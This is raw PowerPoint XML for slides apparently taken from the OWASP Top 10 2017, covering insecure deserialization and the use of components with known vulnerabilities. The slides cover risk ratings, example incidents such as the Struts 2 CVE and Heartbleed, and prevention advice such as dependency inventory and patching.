        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Insecure Deserialization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2815112692"/>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dirty="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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="OpenSymbol"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:cs typeface="Arial"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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" baseline="0">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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Exploitation of deserialization is somewhat difficult, as off the shelf exploits rarely work without changes or tweaks to the underlying exploit code. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>This issue is included in the Top 10 based on an </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t>industry survey</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> and not on quantifiable data.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Some tools can discover deserialization flaws, but human assistance is frequently needed to validate the problem. It is expected that prevalence data for deserialization flaws will increase as tooling is developed to help identify and address it. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>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tc>
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>The impact of deserialization flaws cannot be understated. They can lead to remote code execution attacks, one of the most serious attacks possible.</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2097789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Example Attack Scenarios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Components typically run with the same privileges as the application itself, so flaws in any component can result in serious impact. Such flaws can be accidental (e.g. coding error) or intentional (e.g. backdoor in component). Some example exploitable component vulnerabilities discovered are:</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4"/>
              </a:rPr>
              <a:t>CVE-2017-5638</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, a Struts 2 remote code execution vulnerability that enables execution of arbitrary code on the server, has been blamed for significant breaches.</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While </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>internet of things (IoT)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> are frequently difficult or impossible to patch, the importance of patching them can be great (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>St. Jude pacemakers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>There are automated tools to help attackers find unpatched or misconfigured systems. For example, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shodan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> IoT search engine can help you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>find devices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> that still suffer from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Heartbleed vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> that was patched in April 2014.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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Known Vulnerabilities?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>You are likely vulnerable:</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If you do not know the versions of all components you use (both client-side and server-side). This includes components you directly use as well as nested dependencies.</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If any of your software out of date? This includes the OS, Web/App Server, DBMS, applications, APIs and all components, runtime environments and libraries.</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If you do not know if they are vulnerable. Either if you don’t research for this information or if you don’t scan them for vulnerabilities on a regular base.</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If you do not fix nor upgrade the underlying platform, frameworks and dependencies in a timely fashion. This commonly happens is environments when patching is a monthly or quarterly task under change control, which leaves organizations open to many days or months of unnecessary exposure to fixed vulnerabilities. This is likely the root cause of one of the largest breaches of all time. </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If you do not secure the components' configurations (see A6:2017-Security Misconfiguration).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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9"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard</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0"/>
              </a:rPr>
              <a:t>OWASP Dependency Check (for Java and .NET libraries)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1"/>
              </a:rPr>
              <a:t>OWASP Virtual Patching Best Practices</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>External</a:t>
            </a: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2"/>
              </a:rPr>
              <a:t>The Unfortunate Reality of Insecure Libraries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3"/>
              </a:rPr>
              <a:t>MITRE Common Vulnerabilities and Exposures (CVE) search</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4"/>
              </a:rPr>
              <a:t>National Vulnerability Database (NVD)</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5"/>
              </a:rPr>
              <a:t>Retire.js for detecting known vulnerable JavaScript libraries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6"/>
              </a:rPr>
              <a:t>Node Libraries Security Advisories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7"/>
              </a:rPr>
              <a:t>Ruby Libraries Security Advisory Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>and Tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Software projects should have a process in place to:</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Remove unused dependencies, unnecessary features, components, files, and documentation</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Continuously inventory the versions of both client-side and server-side components and their dependencies using tools like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>versions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>DependencyCheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>retire.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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Continuously monitor sources like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>NVD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> for vulnerabilities in your components. Use software composition analysis tools to automate the process.</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Only obtain your components from official sources and, when possible, prefer signed packages to reduce the chance of getting a modified, malicious component.</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Many libraries and component do not create security patches for out of support or old versions, or it simply be unmaintained. If patching is not possible, consider deploying a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>virtual patch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to monitor, detect or protect against the discovered issue.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Every organization must ensure that there is an ongoing plan for monitoring, triaging, and applying updates or configuration changes for the lifetime of the application or portfolio. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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A9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Using Components </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>with Known Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1559405551"/>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000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="10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000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
